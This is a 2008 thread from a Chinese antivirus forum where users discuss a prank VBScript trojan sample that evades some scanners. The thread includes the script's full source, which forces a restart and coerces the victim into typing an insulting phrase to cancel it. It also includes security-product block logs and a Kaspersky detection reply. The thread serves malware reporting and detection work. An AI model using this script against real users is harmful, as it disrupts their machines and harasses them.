查看: 2473|回复: 14
收起左侧

[病毒样本] 过红伞,过微点的一个可疑文件

[复制链接]
昔我往矣
发表于 2008-8-16 17:09:54 | 显示全部楼层 |阅读模式
右键扫描没反应,微点直接过,打开后,自动关机,建压缩包也自动关机了一次(解压密码:infected)
qianwenxiang
发表于 2008-8-16 17:18:24 | 显示全部楼层
又见这个VBS...

  1. on error resume next
  2. dim WSHshellA
  3. set WSHshellA = wscript.createobject("wscript.shell")
  4. WSHshellA.run "cmd.exe /c shutdown -r -t 60 -c ""我是SB,我爱你,不喊我是SB,我爱你就一分钟关你机,不信,试试···"" ",0 ,true  
  5. dim a
  6. do while(a <> "我是SB,我爱你")
  7. a = inputbox ("我是SB,我爱你,就不关机,快撒,喊 ""我是SB,我爱你"" ","喊不喊","不喊",8000,7000)
  8. msgbox chr(13) + chr(13) + chr(13) + a,0,"MsgBox"
  9. loop
  10. msgbox chr(13) + chr(13) + chr(13) + "早喊不就行了嘛"
  11. dim WSHshell
  12. set WSHshell = wscript.createobject("wscript.shell")
  13. WSHshell.run "cmd.exe /c shutdown -a",0 ,true  
  14. msgbox chr(13) + chr(13) + chr(13) + "哈哈哈哈,真过瘾"
复制代码
xxwpk007
头像被屏蔽
发表于 2008-8-16 18:10:45 | 显示全部楼层
2008-08-16 18:08:38    运行应用程序      操作:阻止
进程路径:C:\WINDOWS\System32\WScript.exe
文件路径:C:\WINDOWS\system32\cmd.exe
命令行:/c shutdown -r -t 60 -c "我是SB,我爱你,不喊我是SB,我爱你就一分钟关你机,不信,试试···"
触发规则:所有程序规则->*

sbbdms
发表于 2008-8-16 18:12:47 | 显示全部楼层
又是一个搞笑VBS……
Kaspersky miss
TO KL
小邪邪
发表于 2008-8-16 18:18:08 | 显示全部楼层
查不出但防得住

mcafee后台自动拦截:
2008-8-16 18:15:30
已由访问保护规则禁止
AD 禁止在本机执行可疑的脚本文件
已阻止的操作: 执行

(这个脚本试图调用很多系统核心模块)

[ 本帖最后由 小邪邪 于 2008-8-16 18:19 编辑 ]
sbbdms
发表于 2008-8-16 18:51:32 | 显示全部楼层
Hello,

####.vbe_ - Trojan.VBS.Shutdown.s

New malicious software was found in this file. It's detection will be included in the next update. Thank you for your help.

Please quote all when answering.

--
Best regards, Vyacheslav Zakorzhevsky
Virus analyst, Kaspersky Lab.
e-mail: newvirus@kaspersky.com
http://www.kaspersky.com/

http://www.kaspersky.com/virusscanner - free online virus scanner.
http://www.kaspersky.com/helpdesk.html - technical support.



> Attachment: ????.rar
qigang
发表于 2008-8-16 18:52:15 | 显示全部楼层

1/0

RS20.57.52未杀!
Palkia
发表于 2008-8-16 18:58:51 | 显示全部楼层

不让调用cmd就哑火了~

尤金卡巴斯基
发表于 2008-8-16 20:07:47 | 显示全部楼层
MISS,已上报
浪滔天
发表于 2008-8-16 20:27:35 | 显示全部楼层
运行后卡巴 2009 提示:
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-5-18 23:08 , Processed in 0.118872 second(s), 18 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表